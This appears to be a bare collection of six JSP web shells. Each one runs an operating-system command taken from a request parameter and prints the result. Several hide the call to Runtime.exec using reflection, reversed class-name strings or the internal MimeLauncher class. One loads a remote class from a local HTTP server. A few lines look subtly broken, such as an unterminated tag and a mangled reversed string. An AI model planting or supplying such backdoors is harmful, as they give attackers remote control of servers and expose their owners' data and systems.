<% if("023".equals(request.getParameter("pwd"))){   java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();    int a = -1; byte[] b = new byte[2048]; out.print("<pre>");   while((a=in.read(b))!=-1){ out.println(new String(b));      }      out.print("</pre>"); } %

<%  String pentest = request.getParameter("pentest");  Process process = new ProcessBuilder(new String[]{pentest}).start();  InputStream is = process.getInputStream();  BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(is));  String r = null;  while((r = bufferedReader.readLine())!=null){    response.getWriter().println(r);  }%>

<%@ page import="java.io.*" %><%@ page import="java.net.URLConnection" %><%@ page import="java.net.URL" %><%@ page import="sun.net.www.MimeEntry" %><%@ page import="java.lang.reflect.Field" %><%@ page import="java.lang.reflect.Constructor" %><%@ page import="java.lang.reflect.Method" %><%@ page language="java" pageEncoding="UTF-8" %><%    String cmd = request.getParameter("cmd");    URLConnection urlConnection = new URL("http://127.0.0.1%s").openConnection();    MimeEntry mimeEntry = new MimeEntry("naihe");    Class meClass = MimeEntry.class;    Field field = meClass.getDeclaredField("command");    field.setAccessible(true);    Field field2 = meClass.getDeclaredField("tempFileNameTemplate");    field2.setAccessible(true);    field2.set(mimeEntry,"naihe%s567");    InputStream inputStream = new InputStream() {        @Override        public int read() throws IOException {            return -1;        }    };    Class mimeClass = Class.forName("sun.net.www.MimeLauncher");    Constructor mimeCon = mimeClass.getDeclaredConstructor(MimeEntry.class,URLConnection.class,            InputStream.class,String.class,String.class);    mimeCon.setAccessible(true);    Thread thread = (Thread) mimeCon.newInstance(mimeEntry, urlConnection, inputStream, "0","0");    Field field3 = mimeClass.getDeclaredField("execPath");    field3.setAccessible(true);    field3.set(thread,cmd);    Method m = mimeClass.getDeclaredMethod("run");    m.setAccessible(true);    m.invoke(thread);%>

<%@ page contentType="text/html;charset=UTF-8"  language="java" %><%@ page import="java.lang.reflect.Method"%><%!public static String reverseStr(String str){String reverse = "";int length = str.length();for (int i = 0; i < length; i++){reverse = str.charAt(i) + reverse;}return reverse;}%><jsp:script>String x = request.getParameter("x");if(x!=null){ Class rt = Class.forName(reverseStr("emitnuR.gnal.avaj")); Method gr = rt.getMethod(reverseStr("emitnuRteg"));    Method ex = rt.getMethod(reverseStr("cexe"), String.class); Process e = (Process) ex.invoke(gr.invoke(null),  x); java.io.InputStream in = e.getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){  out.println(new String(b)); } out.print("</pre>");}</jsp:script>

<%@ page contentType="text/html;charset=UTF-8" language="java"%><%@ page trimDirectiveWhitespaces='true'%><%Runtime%><%.getRuntime()%><%.exec(request.getParameter("test"));%>

<%@ page import="java.net.URL" %><%@ page import="java.net.URLClassLoader" %><%@ page import="java.lang.reflect.Method" %><%!public static String reverseStr(String str){String reverse = "";int length = str.length();for (int i = 0; i < length; i++){reverse = str.charAt(i) + reverse;}return reverse;}%><%  String cmd = request.getParameter("id");  URL url = new URL("http://127.0.0.1:8000/");  URLClassLoader classLoader = new URLClassLoader(new URL[]{url});  System.out.println(classLoader.getParent());  Class shell = classLoader.loadClass(reverseStr("stet.omed.moc)");  Object object =  shell.newInstance();  Method dm = shell.getMethod(reverseStr("snur"),String.class);  Object invoke = dm.invoke(object, cmd);  response.getWriter().println(invoke);%>